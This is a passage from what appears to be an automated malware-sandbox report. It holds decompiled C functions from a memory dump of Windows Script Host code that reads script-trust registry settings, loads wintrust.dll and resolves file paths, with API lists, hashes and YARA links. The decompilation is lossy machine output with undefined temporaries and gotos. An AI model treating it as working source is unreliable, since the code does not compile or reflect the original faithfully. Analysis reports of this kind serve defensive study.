						if( *(_t95 + 0x23) != 0) {
							E00B90ADF(_t125, _t122,  *((intOrPtr*)(_t125 + 0x40)), _v12);
						}
						goto L4;
					}
					__eflags =  *_t87;
					if( *_t87 != 0) {
						goto L21;
					}
					goto L19;
				}
				goto L4;
			}


































                                                        0x00b8648b
                                                        0x00b86497
                                                        0x00b8649a
                                                        0x00b8649d
                                                        0x00b864a0
                                                        0x00b864a5
                                                        0x00b86504
                                                        0x00b86504
                                                        0x00b864a8
                                                        0x00b864b5
                                                        0x00b88bec
                                                        0x00b86500
                                                        0x00000000
                                                        0x00b86500
                                                        0x00b864bb
                                                        0x00b864c4
                                                        0x00b86507
                                                        0x00b8650a
                                                        0x00b88cb7
                                                        0x00b88cc0
                                                        0x00b88cc2
                                                        0x00b88cc4
                                                        0x00b864d4
                                                        0x00b864d7
                                                        0x00b864dd
                                                        0x00b864e2
                                                        0x00b864e7
                                                        0x00b864ec
                                                        0x00b864f1
                                                        0x00b864f3
                                                        0x00b864f8
                                                        0x00b88d41
                                                        0x00b88d41
                                                        0x00b864fe
                                                        0x00000000
                                                        0x00b864fe
                                                        0x00b88cd6
                                                        0x00b88cd8
                                                        0x00b88cda
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88ce0
                                                        0x00b88cf8
                                                        0x00b88cfb
                                                        0x00b88d08
                                                        0x00b88d0a
                                                        0x00b88d0c
                                                        0x00b86512
                                                        0x00b86518
                                                        0x00b864d2
                                                        0x00b864d2
                                                        0x00000000
                                                        0x00b864d2
                                                        0x00000000
                                                        0x00b8651a
                                                        0x00b88d12
                                                        0x00b88d27
                                                        0x00b88d2a
                                                        0x00b88d2d
                                                        0x00b88d30
                                                        0x00b88d36
                                                        0x00b8651c
                                                        0x00b8651e
                                                        0x00b86520
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b86522
                                                        0x00000000
                                                        0x00b86510
                                                        0x00b864cc
                                                        0x00b88bf6
                                                        0x00b88bfc
                                                        0x00b88cae
                                                        0x00000000
                                                        0x00b88cae
                                                        0x00b88c02
                                                        0x00b88c05
                                                        0x00b88c08
                                                        0x00b88c0a
                                                        0x00b88c11
                                                        0x00b88c1b
                                                        0x00b88c1d
                                                        0x00b88c1f
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88c28
                                                        0x00b88c2b
                                                        0x00b88c2e
                                                        0x00b88c3d
                                                        0x00b88c40
                                                        0x00b88c42
                                                        0x00b88c50
                                                        0x00b88c50
                                                        0x00b88c50
                                                        0x00b88c54
                                                        0x00b88c44
                                                        0x00b88c4b
                                                        0x00b88c4b
                                                        0x00b88c57
                                                        0x00b88c5a
                                                        0x00b88c67
                                                        0x00b88c67
                                                        0x00b88c84
                                                        0x00b88c87
                                                        0x00b88c8a
                                                        0x00b88c8d
                                                        0x00b88c9c
                                                        0x00b88c9c
                                                        0x00000000
                                                        0x00b88c8d
                                                        0x00b88c0c
                                                        0x00b88c0f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88c0f
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 00B86529: InterlockedExchange.KERNEL32(?,00000000), ref: 00B8652F
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864DD
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864E2
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864E7
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864EC
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864F1
                                                        Strings
                                                        • WScript_OnScriptTerminate, xrefs: 00B88CFB
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: FreeString$ExchangeInterlocked
                                                        • String ID: WScript_OnScriptTerminate
                                                        • API String ID: 4071441547-526745235
                                                        • Opcode ID: 34c3d3cd4ed6eef21e47032ae112fd0596c7adad7ffad7ffdaa91208b45bc0e0
                                                        • Instruction ID: bd78ac57a1d09b75ab1e42e94848a25e1f363ba5d746dd06b3642b0de82534a7
                                                        • Opcode Fuzzy Hash: 34c3d3cd4ed6eef21e47032ae112fd0596c7adad7ffad7ffdaa91208b45bc0e0
                                                        • Instruction Fuzzy Hash: 98513D71D00219AFDF14EFA4C8848AEBBFAFF48314B2444ADE516A7260DB31AD41DF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B91D96, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 173COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 55%
                                                        			E00B91D96(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				void* _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				long _v48;
				intOrPtr _v64;
				intOrPtr* _v68;
				intOrPtr _v72;
				char _v76;
				void* _t63;
				signed int _t66;
				intOrPtr* _t72;
				signed int _t73;
				intOrPtr* _t75;
				intOrPtr* _t79;
				intOrPtr* _t83;
				intOrPtr* _t91;
				long _t95;
				intOrPtr* _t101;
				intOrPtr _t115;
				intOrPtr* _t117;
				signed int _t120;
				intOrPtr* _t121;

				_t91 = _a12;
				_t120 = 0;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_t63 =  *((intOrPtr*)( *_t91 + 0xc))(_t91,  &_v76);
				if(_t63 >= 0) {
					_t115 = _a4;
					if(E00B86529( *((intOrPtr*)(_t115 + 0x10))) != 0) {
						_t95 = _v48;
						if(_t95 == 0x80004004) {
							L24:
							_t66 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x10)))) + 0x20))();
							L25:
							_t120 = _t66;
							if(_t120 < 0) {
								L27:
								_t117 = __imp__#6;
								 *_t117(_v68);
								 *_t117(_v72);
								 *_t117(_v64);
								 *_t117(_v8);
								 *_t117(_v16);
								_t72 = _v12;
								if(_t72 != 0) {
									 *((intOrPtr*)( *_t72 + 8))(_t72);
								}
								_t73 = _t120;
								L30:
								return _t73;
							}
							L26:
							_t120 = 0;
							goto L27;
						}
						if(_t95 == 0x8004fffc) {
							if( *((intOrPtr*)(_t115 + 0x18)) != 0) {
								goto L27;
							}
							_t75 =  *((intOrPtr*)(_t115 + 0x14));
							 *((intOrPtr*)(_t115 + 0x18)) = 1;
							_t120 =  *((intOrPtr*)( *_t75 + 0x14))(_t75);
							if(_t120 < 0) {
								goto L27;
							}
							_t120 = E00B9054D( *((intOrPtr*)(_t115 + 0x10)),  &_v12);
							if(_t120 < 0) {
								goto L27;
							}
							_t79 = _v12;
							_v24 = _v24 & 0x00000000;
							_v28 = L"WScript_OnScriptTerminate";
							_t120 =  *((intOrPtr*)( *_t79 + 0x14))(_t79, 0xb81804,  &_v28, 1, 0x400,  &_v24);
							if(_t120 >= 0) {
								_t101 = _v12;
								_v44 = 0;
								_v40 = 0;
								_v36 = 0;
								_v32 = 0;
								_t66 =  *((intOrPtr*)( *_t101 + 0x18))(_t101, _v24, 0xb81804, 0x400, 1,  &_v44, 0, 0, 0);
								goto L25;
							}
							if(_t120 == 0x80020006) {
								goto L26;
							}
							goto L27;
						}
						if(_t95 == 0x8004fffd) {
							goto L27;
						}
						if(_t95 == 0x8004fffe) {
							goto L24;
						}
						_t83 = _v68;
						if(_t83 == 0 || 0 ==  *_t83) {
							_t120 = E00B8F3F0(_t95,  &_v16);
							if(_t120 < 0) {
								goto L27;
							}
							_t121 = _v16;
							goto L12;
						} else {
							_t121 = _t83;
							L12:
							_push( &_a12);
							_push( &_v20);
							_push(_t91);
							if( *((intOrPtr*)( *_t91 + 0x10))() < 0) {
								_v20 = _v20 & 0x00000000;
								_a12 = _a12 | 0xffffffff;
							}
							_push( &_v8);
							_push(_t91);
							if( *((intOrPtr*)( *_t91 + 0x14))() < 0) {
								_v8 = _v8 & 0x00000000;
							}
							_t66 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x10)))) + 0x14))(_v20, _a12 + 1, _v72, _t121, _v8, _v48, _a8 & 0x00000001);
							goto L25;
						}
					}
					_t73 = 0x80004005;
					goto L30;
				}
				return _t63;
			}
































                                                        0x00b91d9f
                                                        0x00b91da8
                                                        0x00b91dac
                                                        0x00b91daf
                                                        0x00b91db2
                                                        0x00b91db5
                                                        0x00b91dba
                                                        0x00b91dc1
                                                        0x00b91dce
                                                        0x00b91dda
                                                        0x00b91de3
                                                        0x00b91f1e
                                                        0x00b91f25
                                                        0x00b91f28
                                                        0x00b91f28
                                                        0x00b91f2c
                                                        0x00b91f30
                                                        0x00b91f33
                                                        0x00b91f39
                                                        0x00b91f3e
                                                        0x00b91f43
                                                        0x00b91f48
                                                        0x00b91f4d
                                                        0x00b91f4f
                                                        0x00b91f54
                                                        0x00b91f59
                                                        0x00b91f59
                                                        0x00b91f5c
                                                        0x00b91f5e
                                                        0x00000000
                                                        0x00b91f5e
                                                        0x00b91f2e
                                                        0x00b91f2e
                                                        0x00000000
                                                        0x00b91f2e
                                                        0x00b91def
                                                        0x00b91e8b
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91e91
                                                        0x00b91e94
                                                        0x00b91ea1
                                                        0x00b91ea5
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91eb7
                                                        0x00b91ebb
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91ebd
                                                        0x00b91ec0
                                                        0x00b91eda
                                                        0x00b91ee7
                                                        0x00b91eed
                                                        0x00b91ef9
                                                        0x00b91eff
                                                        0x00b91f02
                                                        0x00b91f05
                                                        0x00b91f08
                                                        0x00b91f19
                                                        0x00000000
                                                        0x00b91f19
                                                        0x00b91ef5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91ef7
                                                        0x00b91dfb
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91e07
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91e0d
                                                        0x00b91e12
                                                        0x00b91e29
                                                        0x00b91e2d
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91e33
                                                        0x00000000
                                                        0x00b91e1b
                                                        0x00b91e1b
                                                        0x00b91e36
                                                        0x00b91e3b
                                                        0x00b91e3f
                                                        0x00b91e40
                                                        0x00b91e46
                                                        0x00b91e48
                                                        0x00b91e4c
                                                        0x00b91e4c
                                                        0x00b91e55
                                                        0x00b91e56
                                                        0x00b91e5c
                                                        0x00b91e5e
                                                        0x00b91e5e
                                                        0x00b91e80
                                                        0x00000000
                                                        0x00b91e80
                                                        0x00b91e12
                                                        0x00b91dd0
                                                        0x00000000
                                                        0x00b91dd0
                                                        0x00b91f62

                                                        APIs
                                                          • Part of subcall function 00B86529: InterlockedExchange.KERNEL32(?,00000000), ref: 00B8652F
                                                        • SysFreeString.OLEAUT32(?), ref: 00B91F39
                                                        • SysFreeString.OLEAUT32(?), ref: 00B91F3E
                                                        • SysFreeString.OLEAUT32(?), ref: 00B91F43
                                                        • SysFreeString.OLEAUT32(?), ref: 00B91F48
                                                        • SysFreeString.OLEAUT32(?), ref: 00B91F4D
                                                        Strings
                                                        • WScript_OnScriptTerminate, xrefs: 00B91EDA
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: FreeString$ExchangeInterlocked
                                                        • String ID: WScript_OnScriptTerminate
                                                        • API String ID: 4071441547-526745235
                                                        • Opcode ID: bdccddd1cd547652fe5821185e2b229bf4ce4d69184c4c0de03763245d8eef2d
                                                        • Instruction ID: 6c08a3fbaa81b859f8c19a61f624f5174fee7b6f6e3f0b9bb23c2313687d8f76
                                                        • Opcode Fuzzy Hash: bdccddd1cd547652fe5821185e2b229bf4ce4d69184c4c0de03763245d8eef2d
                                                        • Instruction Fuzzy Hash: C0517F7190021AAFCF14DFA8C884AAEBBF9FF44750F2449A9E811E7250D730ED41DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B83FF7, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 110registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B83FF7(intOrPtr __ecx, void* __eflags) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				void* _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				long _t43;
				intOrPtr _t54;
				void* _t55;
				char* _t57;

				_t53 = __ecx;
				_t58 = L"Software\\Microsoft\\Windows Script Host\\Settings";
				_v24 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v7 = 0;
				_v5 = 0;
				_v6 = 0;
				_t43 = E00B83415(__ecx, _t55, 0x80000002, L"Software\\Microsoft\\Windows Script Host\\Settings", 0x20019,  &_v12);
				if(_v12 != 0) {
					_t43 = E00B832BE(_t55, _v12, L"IgnoreUserSettings",  &_v7);
				}
				if(_v7 == 0) {
					_t43 = E00B83415(_t53, _t55, 0x80000001, _t58, 0x20019,  &_v16);
				}
				_t59 = L"TrustPolicy";
				_t57 = L"UseWINSAFER";
				if(_v16 == 0) {
					L8:
					if(_v12 != 0) {
						_t43 = E00B8413D(_t55, _v12, _t59,  &_v20);
						if(_t43 >= 0) {
							_v5 = 1;
						}
					}
					L10:
					if(_v6 == 0 && _v12 != 0) {
						_t43 = E00B832BE(_t55, _v12, _t57,  &_v8);
						if(_t43 >= 0) {
							_v6 = 1;
						}
					}
					_t54 = _v24;
					if(_v5 != 0) {
						_t43 = _v20;
						if(_t43 >  *(_t54 + 0x28)) {
							 *(_t54 + 0x28) = _t43;
						}
					}
					if(_v6 != 0) {
						_t43 = _v8;
						 *(_t54 + 0x26) = _t43;
					}
					if(_v16 != 0) {
						_t43 = RegCloseKey(_v16);
					}
					if(_v12 != 0) {
						return RegCloseKey(_v12);
					}
					return _t43;
				}
				if(E00B8413D(_t55, _v16, L"TrustPolicy",  &_v20) >= 0) {
					_v5 = 1;
				}
				_t43 = E00B832BE(_t55, _v16, _t57,  &_v8);
				if(_t43 >= 0) {
					_v6 = 1;
				}
				if(_v5 != 0) {
					goto L10;
				} else {
					goto L8;
				}
			}















                                                        0x00b83ff7
                                                        0x00b8400e
                                                        0x00b84019
                                                        0x00b8401c
                                                        0x00b8401f
                                                        0x00b84022
                                                        0x00b84025
                                                        0x00b84028
                                                        0x00b8402b
                                                        0x00b84033
                                                        0x00b84041
                                                        0x00b84041
                                                        0x00b84049
                                                        0x00b84056
                                                        0x00b84056
                                                        0x00b8405b
                                                        0x00b84060
                                                        0x00b84068
                                                        0x00b84099
                                                        0x00b8409c
                                                        0x00b840a6
                                                        0x00b840ad
                                                        0x00b88430
                                                        0x00b88430
                                                        0x00b840ad
                                                        0x00b840b3
                                                        0x00b840b6
                                                        0x00b840c5
                                                        0x00b840cc
                                                        0x00b840ce
                                                        0x00b840ce
                                                        0x00b840cc
                                                        0x00b840d2
                                                        0x00b840d8
                                                        0x00b88439
                                                        0x00b8843f
                                                        0x00b88445
                                                        0x00b88445
                                                        0x00b8843f
                                                        0x00b840e1
                                                        0x00b840e3
                                                        0x00b840e6
                                                        0x00b840e6
                                                        0x00b840f2
                                                        0x00b840f7
                                                        0x00b840f7
                                                        0x00b840fc
                                                        0x00000000
                                                        0x00b84101
                                                        0x00b84107
                                                        0x00b84107
                                                        0x00b84079
                                                        0x00b8841e
                                                        0x00b8841e
                                                        0x00b84087
                                                        0x00b8408e
                                                        0x00b88427
                                                        0x00b88427
                                                        0x00b84097
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 00B83415: RegOpenKeyExW.ADVAPI32 ref: 00B83444
                                                        • RegCloseKey.ADVAPI32(00B82238), ref: 00B840F7
                                                        • RegCloseKey.ADVAPI32(00B82218), ref: 00B84101
                                                          • Part of subcall function 00B832BE: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00B8331B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Close$OpenQueryValue
                                                        • String ID: IgnoreUserSettings$Software\Microsoft\Windows Script Host\Settings$TrustPolicy$UseWINSAFER
                                                        • API String ID: 1607946009-2293819020
                                                        • Opcode ID: 7182d1512e109dce6ae039d1c47a2bb2652e1b22c524d2f05e39fd14197bae40
                                                        • Instruction ID: 87bd453de9e35d3e93edeacf296207755f0490b21014dfadd70ee39bc4f5a5be
                                                        • Opcode Fuzzy Hash: 7182d1512e109dce6ae039d1c47a2bb2652e1b22c524d2f05e39fd14197bae40
                                                        • Instruction Fuzzy Hash: 36414C71C0528ABADF11FBD588459EFBFF8EF11704F5840EAE644B2121D3354A89DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B83B1E, Relevance: 10.6, APIs: 7, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E00B83B1E(void* __edx, short* _a4, int _a8, short* _a12, LPWSTR* _a16) {
				signed int _v8;
				char* _v12;
				CHAR* _v16;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t26;
				void* _t47;
				char* _t48;
				signed int _t49;
				signed int _t52;
				char* _t53;
				intOrPtr _t55;

				_t47 = __edx;
				_t23 =  *0xb97004; // 0xbb40e64e
				_v8 = _t23 ^ _t52;
				_t49 = 0;
				_t55 =  *0xb97001; // 0x0
				if(_t55 == 0) {
					_t48 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, 0);
					if(_t48 == 0) {
						L3:
						_t26 = GetLastError();
						if(_t26 > 0) {
							_t26 = _t26 & 0x0000ffff | 0x80070000;
						}
						_t49 = _t26;
						L2:
						return E00B81335(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
					}
					E00B8320B(_t25);
					_v12 = _t53;
					if(_t53 != 0) {
						if(WideCharToMultiByte(0, 0, _a4, 0xffffffff, _v12, _t48, 0, 0) == 0) {
							goto L3;
						}
						E00B8320B(_a8);
						_t48 = _t53;
						if(GetFullPathNameA(_v12, _a8, _t48,  &_v16) == 0 || MultiByteToWideChar(0, 0, _t48, 0xffffffff, _a12, _a8) == 0) {
							goto L3;
						} else {
							 *_a16 =  &(_a12[MultiByteToWideChar(0, 0, _t48, _v16 - _t48, 0, 0)]);
							_t49 = 0;
							goto L2;
						}
					}
					_t49 = 0x8007000e;
					goto L2;
				}
				if(GetFullPathNameW(_a4, _a8, _a12, _a16) == 0) {
					goto L3;
				}
				goto L2;
			}


















                                                        0x00b83b1e
                                                        0x00b83b26
                                                        0x00b83b2d
                                                        0x00b83b34
                                                        0x00b83b37
                                                        0x00b83b3d
                                                        0x00b8957b
                                                        0x00b8957f
                                                        0x00b8954d
                                                        0x00b8954d
                                                        0x00b89555
                                                        0x00b8955c
                                                        0x00b8955c
                                                        0x00b89561
                                                        0x00b83b5d
                                                        0x00b83b70
                                                        0x00b83b70
                                                        0x00b89581
                                                        0x00b89586
                                                        0x00b8958b
                                                        0x00b895a8
                                                        0x00000000
                                                        0x00000000
                                                        0x00b895ad
                                                        0x00b895b2
                                                        0x00b895c7
                                                        0x00000000
                                                        0x00b895e4
                                                        0x00b895fa
                                                        0x00b895fc
                                                        0x00000000
                                                        0x00b895fc
                                                        0x00b895c7
                                                        0x00b8958d
                                                        0x00000000
                                                        0x00b8958d
                                                        0x00b83b57
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00B83B4F
                                                        • GetLastError.KERNEL32(?,?,?), ref: 00B8954D
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00B89579
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharErrorFullLastMultiNamePathWide
                                                        • String ID:
                                                        • API String ID: 1285381999-0
                                                        • Opcode ID: c08c525aca75bd7bdd940175d812f89dc8dd37ab71b6796d03cb18f55f50e0e7
                                                        • Instruction ID: 757645a13ee9f0838dd31aa0e680cdd5accd1dc9a24b8ad44c1aa8ef36d07779
                                                        • Opcode Fuzzy Hash: c08c525aca75bd7bdd940175d812f89dc8dd37ab71b6796d03cb18f55f50e0e7
                                                        • Instruction Fuzzy Hash: 52318FB250014DBF9F11AFA4CC80DBF7BEDEB457A4B1445A9FA21A7160CA31DE11DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8D30C, Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 32%
                                                        			E00B8D30C(int* _a4, void* _a8, int _a12, long _a16) {
				signed int _v8;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				int _t16;
				int* _t18;
				int* _t28;
				int* _t29;
				void* _t30;
				void* _t31;
				int* _t32;
				signed int _t33;
				void* _t34;

				_t15 =  *0xb97004; // 0xbb40e64e
				_t16 = _t15 ^ _t33;
				_v8 = _t16;
				_t32 = _a4;
				_t31 = _a8;
				if(_t31 != 0 || _a12 <= 0) {
					if(_t32 != 0) {
						 *_t32 =  *_t32 | 0xffffffff;
					}
					if(_a12 <= 0x7fffffff) {
						_t16 = wctomb( &_v16, _a16);
						if(_t16 >= 0) {
							if(_t32 != 0) {
								 *_t32 = _t16;
							}
							if(_a12 >= _t16) {
								if(_t31 != 0) {
									memcpy(_t31,  &_v16, _t16);
								}
								goto L23;
							} else {
								if(_t31 != 0 && _a12 > 0) {
									_t16 = memset(_t31, 0, _a12);
									_t34 = _t34 + 0xc;
								}
								__imp___errno();
								_push(0x22);
								goto L8;
							}
						}
						if(_t31 != 0 && _a12 > 0) {
							_t16 = memset(_t31, 0, _a12);
						}
						__imp___errno();
						_t29 = 0x2a;
						 *_t16 = _t29;
						_t18 = _t29;
					} else {
						__imp___errno();
						_push(0x16);
						L8:
						_pop(_t28);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_t32 = _t28;
						 *_t16 = _t28;
						E00B8CDE6(0, _t28, _t30, _t31, _t32);
						_t18 = _t32;
					}
					goto L24;
				} else {
					if(_t32 != 0) {
						 *_t32 = 0;
					}
					L23:
					_t18 = 0;
					L24:
					return E00B81335(_t18, 0, _v8 ^ _t33, _t30, _t31, _t32);
				}
			}


















                                                        0x00b8d314
                                                        0x00b8d319
                                                        0x00b8d31b
                                                        0x00b8d320
                                                        0x00b8d324
                                                        0x00b8d32b
                                                        0x00b8d343
                                                        0x00b8d345
                                                        0x00b8d345
                                                        0x00b8d34f
                                                        0x00b8d376
                                                        0x00b8d380
                                                        0x00b8d3a9
                                                        0x00b8d3ab
                                                        0x00b8d3ab
                                                        0x00b8d3b0
                                                        0x00b8d3d4
                                                        0x00b8d3dc
                                                        0x00b8d3e1
                                                        0x00000000
                                                        0x00b8d3b2
                                                        0x00b8d3b4
                                                        0x00b8d3c0
                                                        0x00b8d3c5
                                                        0x00b8d3c5
                                                        0x00b8d3c8
                                                        0x00b8d3ce
                                                        0x00000000
                                                        0x00b8d3ce
                                                        0x00b8d3b0
                                                        0x00b8d384
                                                        0x00b8d390
                                                        0x00b8d395
                                                        0x00b8d398
                                                        0x00b8d3a0
                                                        0x00b8d3a1
                                                        0x00b8d3a3
                                                        0x00b8d351
                                                        0x00b8d351
                                                        0x00b8d357
                                                        0x00b8d359
                                                        0x00b8d359
                                                        0x00b8d35a
                                                        0x00b8d35b
                                                        0x00b8d35c
                                                        0x00b8d35d
                                                        0x00b8d35e
                                                        0x00b8d35f
                                                        0x00b8d361
                                                        0x00b8d363
                                                        0x00b8d36b
                                                        0x00b8d36b
                                                        0x00000000
                                                        0x00b8d332
                                                        0x00b8d334
                                                        0x00b8d33a
                                                        0x00b8d33a
                                                        0x00b8d3e4
                                                        0x00b8d3e4
                                                        0x00b8d3e6
                                                        0x00b8d3f4
                                                        0x00b8d3f4

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: _errno$memsetwctomb
                                                        • String ID:
                                                        • API String ID: 3431484887-0
                                                        • Opcode ID: 680a03d0bdb969fdb0c8346dac378fed93662a780cda6412c6e0d74d7295f41a
                                                        • Instruction ID: c3088902c6054a29b9d34c6ea4efa5d9864296ece6f63815a4303bff7f70215b
                                                        • Opcode Fuzzy Hash: 680a03d0bdb969fdb0c8346dac378fed93662a780cda6412c6e0d74d7295f41a
                                                        • Instruction Fuzzy Hash: D1216B72A0134AEBCF207F68ACC54AE7BE9EB54314B1406AFF661971E0DB318941C75B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B855CA, Relevance: 10.6, APIs: 7, Instructions: 84libraryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E00B855CA(void* __ecx, intOrPtr* _a4, signed int* _a8) {
				char _v5;
				signed int _t13;
				intOrPtr* _t16;
				CHAR* _t17;
				signed int _t19;
				struct HINSTANCE__* _t23;
				CHAR* _t25;
				void* _t28;
				intOrPtr _t32;
				int _t39;
				signed int _t40;

				 *_a8 =  *_a8 & 0x00000000;
				_t39 = GetSystemDirectoryA( &_v5, 0);
				if(_t39 == 0) {
					_t13 = GetLastError();
					if(_t13 > 0) {
						_t13 = _t13 & 0x0000ffff | 0x80070000;
					}
					_t40 = _t13;
					L10:
					return _t40;
				}
				_t16 = _a4;
				_t28 = _t16 + 1;
				do {
					_t32 =  *_t16;
					_t16 = _t16 + 1;
				} while (_t32 != 0);
				_t17 = _t16 - _t28;
				_t34 =  &(_t17[_t39 + 2]);
				_push( &(_t17[_t39 + 2]));
				L00B82877();
				_t25 = _t17;
				if(_t25 == 0) {
					_t40 = 0x8007000e;
					L7:
					if(_t25 != 0) {
						_push(_t25);
						L00B82082();
					}
					goto L10;
				}
				if(GetSystemDirectoryA(_t25, _t39 + 1) == 0) {
					L15:
					_t19 = GetLastError();
					if(_t19 > 0) {
						_t19 = _t19 & 0x0000ffff | 0x80070000;
					}
					_t40 = _t19;
					goto L7;
				}
				E00B85673(_t18 + _t25, _t34 - _t18, E00B855B8);
				E00B85673(_t18 + _t25 + 1, _t34 - _t18 - 1, _a4);
				_t23 = LoadLibraryA(_t25);
				if(_t23 == 0) {
					goto L15;
				}
				 *_a8 = _t23;
				_t40 = 0;
				goto L7;
			}














                                                        0x00b855d3
                                                        0x00b855e3
                                                        0x00b855e7
                                                        0x00b88d49
                                                        0x00b88d51
                                                        0x00b88d5f
                                                        0x00b88d5f
                                                        0x00b88d53
                                                        0x00b85667
                                                        0x00b8566b
                                                        0x00b8566b
                                                        0x00b855ed
                                                        0x00b855f0
                                                        0x00b855f3
                                                        0x00b855f3
                                                        0x00b855f5
                                                        0x00b855f6
                                                        0x00b855fb
                                                        0x00b855fe
                                                        0x00b85602
                                                        0x00b85603
                                                        0x00b85608
                                                        0x00b8560d
                                                        0x00b88d66
                                                        0x00b8565a
                                                        0x00b8565c
                                                        0x00b8565e
                                                        0x00b8565f
                                                        0x00b85664
                                                        0x00000000
                                                        0x00b85666
                                                        0x00b8561e
                                                        0x00b88d70
                                                        0x00b88d70
                                                        0x00b88d78
                                                        0x00b88d7f
                                                        0x00b88d7f
                                                        0x00b88d84
                                                        0x00000000
                                                        0x00b88d84
                                                        0x00b85630
                                                        0x00b8563c
                                                        0x00b85645
                                                        0x00b8564d
                                                        0x00000000
                                                        0x00000000
                                                        0x00b85656
                                                        0x00b85658
                                                        0x00000000

                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000000), ref: 00B855DD
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B85603
                                                        • GetSystemDirectoryA.KERNEL32(00000000,00000001), ref: 00B85616
                                                        • LoadLibraryA.KERNEL32(00000000), ref: 00B85645
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00B8565F
                                                        • GetLastError.KERNEL32(?,?,?,00B912B8,wintrust.dll,00B905FC,?,?,00000000), ref: 00B88D49
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: DirectorySystem$??2@??3@ErrorLastLibraryLoad
                                                        • String ID:
                                                        • API String ID: 2582802516-0
                                                        • Opcode ID: e0d1418fdf4390ea887cc2e4cc85568a9a3cbb4c6882280400b6d9499a634e38
                                                        • Instruction ID: b08a04a0f4f372b4e21d09c278451f6dd1e85975ba6a8279f13708dbb4ebdeb0
                                                        • Opcode Fuzzy Hash: e0d1418fdf4390ea887cc2e4cc85568a9a3cbb4c6882280400b6d9499a634e38
                                                        • Instruction Fuzzy Hash: A3210132600612ABD7307B69DC89F673BDCEF523A0B4445B9F806DB1B1EE24C905C7A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B820CF, Relevance: 10.6, APIs: 7, Instructions: 78stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E00B820CF() {
				signed int _v8;
				short* _v12;
				char* _v16;
				signed int _t15;
				char* _t19;
				void* _t28;
				WCHAR* _t30;
				void* _t37;
				void* _t40;
				void* _t41;
				int _t42;
				void* _t44;
				short* _t46;
				signed int _t50;
				short* _t51;
				void* _t52;
				intOrPtr _t54;
